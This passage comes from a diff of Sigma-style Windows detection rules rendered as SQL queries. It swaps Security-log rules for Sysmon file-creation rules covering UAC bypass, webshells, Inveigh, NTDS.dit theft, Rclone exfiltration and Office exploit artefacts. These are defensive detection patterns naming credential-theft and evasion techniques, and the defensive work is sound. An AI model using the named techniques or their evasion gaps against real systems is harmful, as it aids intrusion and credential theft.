"filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ 
- "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. 
This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program 
Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious 
parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are 
generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", - "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": 
"Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of 
exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate 
executable files in a web application folder" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "status": "test", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + 
"attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "System administrators managing certififcates." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_pfx_file_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of an file in user Word Startup", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. 
(From elastic FP section)" + "Addition of legitimate plugins" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - 
"attack.t1112" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - 
